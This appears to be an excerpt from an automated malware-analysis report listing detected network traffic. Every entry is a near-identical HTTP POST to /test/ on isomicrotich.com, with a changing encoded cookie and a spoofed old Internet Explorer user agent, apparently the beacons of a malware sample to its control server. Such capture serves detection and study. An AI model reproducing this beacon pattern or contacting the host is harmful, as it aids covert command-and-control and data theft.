                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
